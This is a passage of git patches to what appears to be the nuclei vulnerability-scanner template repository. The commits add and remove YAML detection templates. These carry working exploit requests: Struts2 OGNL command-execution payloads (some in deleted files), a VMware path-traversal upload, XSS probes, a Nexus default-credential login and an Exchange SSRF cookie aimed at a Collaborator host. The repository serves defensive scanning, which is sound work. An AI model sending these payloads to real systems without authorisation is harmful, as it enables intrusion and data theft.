insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 82d6b5e71c..bb249da855 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 | +| cves | 221 | vulnerabilities | 105 | exposed-panels | 100 | | exposures | 60 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 672 files**. +**69 directories, 677 files**. From b2e4914f9849ac2961191b61aa90a508c1d2201c Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 5 Mar 2021 15:27:05 +0700 Subject: [PATCH 259/370] :fire: Add CVE-2021-21978 --- cves/2021/CVE-2021-21978.yaml | 44 +++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 cves/2021/CVE-2021-21978.yaml diff --git a/cves/2021/CVE-2021-21978.yaml b/cves/2021/CVE-2021-21978.yaml new file mode 100644 index 0000000000..1898303c2e --- /dev/null +++ b/cves/2021/CVE-2021-21978.yaml @@ -0,0 +1,44 @@ +id: CVE-2021-21978 + +info: + name: VMware View Planner Unauthenticated RCE + author: dwisiswant0 + severity: critical + reference: https://twitter.com/osama_hroot/status/1367258907601698816 + description: | + This template detects an VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability. + Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. + An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted + file leading to remote code execution within the logupload container. + tags: cve,cve2021,vmware,rce + +requests: + - raw: + - | + POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS + Accept: text/html + Referer: {{BaseURL}} + Connection: close + + ------WebKitFormBoundarySHHbUsfCoxlX1bpS + Content-Disposition: form-data; name="logfile"; filename="" + Content-Type: text/plain + + POC_TEST + + ------WebKitFormBoundarySHHbUsfCoxlX1bpS + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "File uploaded successfully." + part: body + - type: dsl + dsl: + - "len(body) == 28" # lenght of "\nFile uploaded successfully." \ No newline at end of file From df24aca916b3e31249046d41fcf3973f3c70922e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 5 Mar 2021 15:29:13 +0700 Subject: [PATCH 260/370] :pencil2: Fix misspelling of 'image' in content-type --- cves/2021/CVE-2021-3378.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index 4829a293a3..f39c826555 100644 --- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -24,7 +24,7 @@ requests: ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="file"; filename="poc.txt" - Content-Type: imnage/png + Content-Type: image/png POC_TEST From c7aa1e5b1202e95c803d83d044fbbe46449565c9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 5 Mar 2021 17:40:42 +0530 Subject: [PATCH 261/370] Delete CVE-2020-14815.yaml Removing this template as it's can't be detected accurately. --- cves/2020/CVE-2020-14815.yaml | 27 --------------------------- 1 file changed, 27 deletions(-) delete mode 100644 cves/2020/CVE-2020-14815.yaml diff --git a/cves/2020/CVE-2020-14815.yaml b/cves/2020/CVE-2020-14815.yaml deleted file mode 100644 index 1f227cef61..0000000000 --- a/cves/2020/CVE-2020-14815.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2020-14815 - -info: - name: Oracle Business Intelligence XSS - author: pikpikcu - severity: medium - reference: https://www.oracle.com/security-alerts/cpuoct2020.html - tags: cve,cve2020,oracle,xss - source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480 - -requests: - - method: GET - path: - - "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "X-Oracle-Dms-Ecid:" - - "X-Oracle-Dms-Rid:" - - "Set-Cookie:" - part: header - condition: and \ No newline at end of file From 299f327e9a3c02303935b2f18c02d5d24768b056 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 5 Mar 2021 12:14:59 +0000 Subject: [PATCH 262/370] Auto Update README [Fri Mar 5 12:14:59 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index bb249da855..27033a9b37 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 221 | vulnerabilities | 105 | exposed-panels | 100 | +| cves | 220 | vulnerabilities | 105 | exposed-panels | 100 | | exposures | 60 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 677 files**. +**69 directories, 676 files**. From 3249f7f6ca9edbf95c939d6c54e78eeecbdeaf2c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 5 Mar 2021 14:38:39 +0000 Subject: [PATCH 263/370] =?UTF-8?q?=F0=9F=93=9D=20CVE-2019-0221?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2019/CVE-2019-0221.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2019/CVE-2019-0221.yaml diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml new file mode 100644 index 0000000000..a14d2acc9a --- /dev/null +++ b/cves/2019/CVE-2019-0221.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-0221 + +info: + name: Apache Tomcat XSS + author: pikpikcu + severity: low + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-0221 + description: | + The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and + 7.0.0 to 7.0.93 echoes user provided data without escaping and is, + therefore, vulnerable to XSS. SSI is disabled by default. + The printenv command is intended for debugging and is unlikely to be present in a production website. + tags: cve, cve2019,apache,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E" + + matchers-condition: and + matchers: + + - type: word + words: + - "" + condition: and + + - type: status + status: + - 200 From cc641d9946e986ef23e9410c01f9551f28ec5a54 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Mar 2021 02:09:54 +0530 Subject: [PATCH 264/370] removing few templates --- cves/2007/CVE-2007-4556.yaml | 2 +- cves/2012/CVE-2012-0392.yaml | 3 +-- cves/2012/CVE-2012-0838.yaml | 31 ------------------------------- cves/2013/CVE-2013-1965.yaml | 1 - cves/2013/CVE-2013-1966.yaml | 32 -------------------------------- cves/2013/CVE-2013-2134.yaml | 32 -------------------------------- cves/2013/CVE-2013-2135.yaml | 25 ------------------------- cves/2017/CVE-2017-12611.yaml | 3 +-- cves/2018/CVE-2018-11776.yaml | 3 +-- 9 files changed, 4 insertions(+), 128 deletions(-) delete mode 100644 cves/2012/CVE-2012-0838.yaml delete mode 100644 cves/2013/CVE-2013-1966.yaml delete mode 100644 cves/2013/CVE-2013-2134.yaml delete mode 100644 cves/2013/CVE-2013-2135.yaml diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index ba0fb52f99..0d3b5af374 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml @@ -22,7 +22,7 @@ requests: - type: regex regex: - "root:[x*]:0:0" - condition: and + part: body - type: status status: diff --git a/cves/2012/CVE-2012-0392.yaml b/cves/2012/CVE-2012-0392.yaml index 1b40dea9cb..05a2156fae 100644 --- a/cves/2012/CVE-2012-0392.yaml +++ b/cves/2012/CVE-2012-0392.yaml @@ -18,8 +18,7 @@ requests: - type: regex regex: - "root:[x*]:0:0" - condition: and - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/cves/2012/CVE-2012-0838.yaml b/cves/2012/CVE-2012-0838.yaml deleted file mode 100644 index aabf87fb1b..0000000000 --- a/cves/2012/CVE-2012-0838.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2012-0838 - -info: - name: Apache Struts2 S2-007 RCE - author: pikpikcu - severity: critical - reference: https://blog.csdn.net/weixin_43416469/article/details/113849942 - tags: cve,cve2012,apache,struts,rce - -requests: - - method: POST - path: - - "{{BaseURL}}/user.action" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - name=tes&email=tes&age=%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%29+%2B+%27 - - matchers-condition: and - matchers: - - - type: regex - regex: - - "uid(.*)" - - "gid(.*)" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml index 38a168df56..b39b275ce9 100644 --- a/cves/2013/CVE-2013-1965.yaml +++ b/cves/2013/CVE-2013-1965.yaml @@ -22,7 +22,6 @@ requests: - type: regex regex: - "root:[x*]:0:0" - condition: and - type: status status: diff --git a/cves/2013/CVE-2013-1966.yaml b/cves/2013/CVE-2013-1966.yaml deleted file mode 100644 index 6a4732774f..0000000000 --- a/cves/2013/CVE-2013-1966.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2013-1966 - -info: - name: Apache Struts2 S2-013 RCE - author: pikpikcu - severity: critical - reference: https://blog.csdn.net/weixin_43416469/article/details/113636581?utm_medium=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control - tags: cve,cve2013,apache,rce,struts - -requests: - - method: GET - path: - - "{{BaseURL}}/link.action?a=%24%7b%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%22%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%22%5d%3d%74%72%75%65%2c%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%62%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%61%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%63%2e%72%65%61%64%28%23%64%29%2c%23%6f%75%74%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%73%74%72%75%74%73%32%2e%53%65%72%76%6c%65%74%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%40%67%65%74%52%65%73%70%6f%6e%73%65%28%29%2e%67%65%74%57%72%69%74%65%72%28%29%2c%23%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%27%64%62%61%70%70%3d%27%2b%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%64%29%29%2c%23%6f%75%74%2e%63%6c%6f%73%65%28%29%7d" - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 - - matchers-condition: and - matchers: - - type: word - words: - - "Content-Type: text/html;charset=UTF-8" - part: header - - - type: regex - regex: - - "root:[x*]:0:0" - condition: and - - - type: status - status: - - 200 diff --git a/cves/2013/CVE-2013-2134.yaml b/cves/2013/CVE-2013-2134.yaml deleted file mode 100644 index ad8111c610..0000000000 --- a/cves/2013/CVE-2013-2134.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2013-2134 - -info: - name: Apache Struts2 S2-015 RCE - author: pikpikcu - severity: critical - reference: https://blog.csdn.net/weixin_43416469/article/details/113852197?utm_medium=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control - tags: cve,cve2013,apache,rce,struts - -requests: - - method: GET - path: - - "{{BaseURL}}/param.action?message=%25%7b%23%61%3d%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%50%72%6f%63%65%73%73%42%75%69%6c%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%5b%5d%7b%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%7d%29%29%2e%72%65%64%69%72%65%63%74%45%72%72%6f%72%53%74%72%65%61%6d%28%74%72%75%65%29%2e%73%74%61%72%74%28%29%2c%23%62%3d%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%63%29%2c%23%65%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%64%2e%72%65%61%64%28%23%65%29%2c%23%66%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74%52%65%73%70%6f%6e%73%65%22%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%70%72%69%6e%74%6c%6e%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%65%29%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%66%6c%75%73%68%28%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%63%6c%6f%73%65%28%29%7d" - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 - - matchers-condition: and - matchers: - - type: word - words: - - "Content-Type: text/html" - part: header - - - type: regex - regex: - - "root:[x*]:0:0" - condition: and - - - type: status - status: - - 200 diff --git a/cves/2013/CVE-2013-2135.yaml b/cves/2013/CVE-2013-2135.yaml deleted file mode 100644 index 49b8b8479d..0000000000 --- a/cves/2013/CVE-2013-2135.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2013-2135 - -info: - name: Apache Struts2 S2-015 RCE - author: pikpikcu - severity: critical - reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2135 - tags: cve,cve2013,apache,rce,struts - -requests: - - method: GET - path: - - "{{BaseURL}}/param.action${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}.action" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - condition: and - - - type: status - status: - - 404 diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml index 2519feaf3f..a64eea1c2c 100644 --- a/cves/2017/CVE-2017-12611.yaml +++ b/cves/2017/CVE-2017-12611.yaml @@ -18,8 +18,7 @@ requests: - type: regex regex: - "root:[x*]:0:0" - condition: and - + - type: status status: - 200 diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml index 522ae3000b..4565a6163c 100644 --- a/cves/2018/CVE-2018-11776.yaml +++ b/cves/2018/CVE-2018-11776.yaml @@ -18,8 +18,7 @@ requests: - type: regex regex: - "root:[x*]:0:0" - condition: and - + - type: status status: - 200 From 6c84f959f94d1fb759410252b7c837e3f624c669 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Mar 2021 02:14:21 +0530 Subject: [PATCH 265/370] fixed trailing spaces --- cves/2017/CVE-2017-12611.yaml | 2 +- cves/2018/CVE-2018-11776.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml index a64eea1c2c..08f492bb34 100644 --- a/cves/2017/CVE-2017-12611.yaml +++ b/cves/2017/CVE-2017-12611.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - "root:[x*]:0:0" - + - type: status status: - 200 diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml index 4565a6163c..220780dedd 100644 --- a/cves/2018/CVE-2018-11776.yaml +++ b/cves/2018/CVE-2018-11776.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - "root:[x*]:0:0" - + - type: status status: - 200 From 8826f380d6480cbbb868312ea082a085f785f59a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 5 Mar 2021 20:46:48 +0000 Subject: [PATCH 266/370] Auto Update README [Fri Mar 5 20:46:48 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 27033a9b37..81af360a9a 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 220 | vulnerabilities | 105 | exposed-panels | 100 | +| cves | 227 | vulnerabilities | 105 | exposed-panels | 100 | | exposures | 60 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 676 files**. +**71 directories, 683 files**. From 5555d64db3ec55072c49a4359dc8547285d1ddfe Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 6 Mar 2021 02:04:44 +0000 Subject: [PATCH 267/370] Update CVE-2019-0221.yaml --- cves/2019/CVE-2019-0221.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml index a14d2acc9a..ea7e1f4d23 100644 --- a/cves/2019/CVE-2019-0221.yaml +++ b/cves/2019/CVE-2019-0221.yaml @@ -10,7 +10,7 @@ info: 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. - tags: cve, cve2019,apache,xss + tags: cve,cve2019,apache,xss requests: - method: GET From 7851d3125307ed4fb85082e239e91139f3a167f5 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 6 Mar 2021 02:36:53 +0000 Subject: [PATCH 268/370] Create nexus-default-password.yaml --- .../nexus/nexus-default-password.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 default-logins/nexus/nexus-default-password.yaml diff --git a/default-logins/nexus/nexus-default-password.yaml b/default-logins/nexus/nexus-default-password.yaml new file mode 100644 index 0000000000..e4b30a3931 --- /dev/null +++ b/default-logins/nexus/nexus-default-password.yaml @@ -0,0 +1,25 @@ +id: nexus-default-password + +info: + name: Nexus Default Password + author: pdteam + severity: low + tags: nexus,dlogin + +requests: + - method: GET + path: + - "{{BaseURL}}/service/local/authentication/login" + headers: + Content-Type: application/json + Authorization: "Basic YWRtaW46YWRtaW4xMjM=" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "loggedIn" + condition: and From 46b484f9ad019a9275516328b53e5521e95ca0f7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 6 Mar 2021 11:28:28 +0530 Subject: [PATCH 269/370] Update CVE-2019-0221.yaml --- cves/2019/CVE-2019-0221.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml index ea7e1f4d23..90b1081257 100644 --- a/cves/2019/CVE-2019-0221.yaml +++ b/cves/2019/CVE-2019-0221.yaml @@ -23,7 +23,11 @@ requests: - type: word words: - "" - condition: and + + - type: word + words: + - "text/html" + part: header - type: status status: From a52d6fd7e57a3308bec402f0143a56c818536269 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Mar 2021 05:59:16 +0000 Subject: [PATCH 270/370] Auto Update README [Sat Mar 6 05:59:16 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 81af360a9a..2165399464 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 227 | vulnerabilities | 105 | exposed-panels | 100 | +| cves | 228 | vulnerabilities | 105 | exposed-panels | 100 | | exposures | 60 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**71 directories, 683 files**. +**71 directories, 684 files**. From cde0571f4b768539207d822d9717ad6145ef1ee2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 6 Mar 2021 11:56:16 +0530 Subject: [PATCH 271/370] misc updates --- cves/2016/CVE-2016-3081.yaml | 2 +- cves/2017/CVE-2017-5638.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index f0478d8b38..1e15993eb2 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -1,7 +1,7 @@ id: CVE-2016-3081 info: - name: S2-032 Struts RCE + name: Apache S2-032 Struts RCE author: dhiyaneshDK severity: high reference: https://cwiki.apache.org/confluence/display/WW/S2-032 diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index 6696adbe72..11d7004986 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -1,7 +1,7 @@ id: CVE-2017-5638 info: author: Random Robbie - name: Struts2 RCE + name: Apache Struts2 RCE severity: critical description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. tags: cve,cve2017,struts,rce,apache From 55e4c5d32ed5a298405409f35272247b1e0626b8 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Sat, 6 Mar 2021 12:30:59 +0530 Subject: [PATCH 272/370] Create CVE-2021-26855.yaml --- cves/2021/CVE-2021-26855.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-26855.yaml diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml new file mode 100644 index 0000000000..0b1f46750a --- /dev/null +++ b/cves/2021/CVE-2021-26855.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-26855 + +info: + name: Exchange Server SSRF Vulnerability + author: madrobot + severity: critical + reference: https://proxylogon.com/#timeline + description: | + Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. + tags: cve,cve2021,ssrf,rce,exchange + +requests: + - raw: + - | + GET /owa/auth/x.js HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;pro + Accept-Language: en + Connection: close + + + # Detection script + # https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse + # https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 + + matchers-condition: and + matchers: + - type: status + status: + - 500 + - type: word + words: + - "NegotiateSecurityContext" + part: body + condtion: and From d12120355c0aa12d2b98796ca7922f71f231435b Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Sat, 6 Mar 2021 12:37:41 +0530 Subject: [PATCH 273/370] Update CVE-2021-26855.yaml --- cves/2021/CVE-2021-26855.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index 0b1f46750a..8deb576ec9 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -15,7 +15,7 @@ requests: GET /owa/auth/x.js HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;pro + Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; Accept-Language: en Connection: close From 9ac013952d985e336bd1900f70695fb89eb206c7 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Sat, 6 Mar 2021 12:46:45 +0530 Subject: [PATCH 274/370] Update CVE-2021-26855.yaml --- cves/2021/CVE-2021-26855.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index 8deb576ec9..4f67df6255 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -15,7 +15,7 @@ requests: GET /owa/auth/x.js HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; + Cookie: X-AnonResource=true; X-AnonResource-Backend=vih3tn1ubo2welhfoqwaenoin9tzho.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; Accept-Language: en Connection: close @@ -28,9 +28,9 @@ requests: matchers: - type: status status: - - 500 + - 200 - type: word words: - - "NegotiateSecurityContext" + - "vih3tn1ubo2welhfoqwaenoin9tzho" part: body condtion: and From 61327f4d96a6f8db3d25f9c08eb3b2812483fa6d Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Sat, 6 Mar 2021 13:02:30 +0530 Subject: [PATCH 275/370] Update CVE-2021-26855.yaml --- cves/2021/CVE-2021-26855.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index 4f67df6255..afe13d3e0b 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -15,7 +15,7 @@ requests: GET /owa/auth/x.js HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Cookie: X-AnonResource=true; X-AnonResource-Backend=vih3tn1ubo2welhfoqwaenoin9tzho.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; + Cookie: X-AnonResource=true; 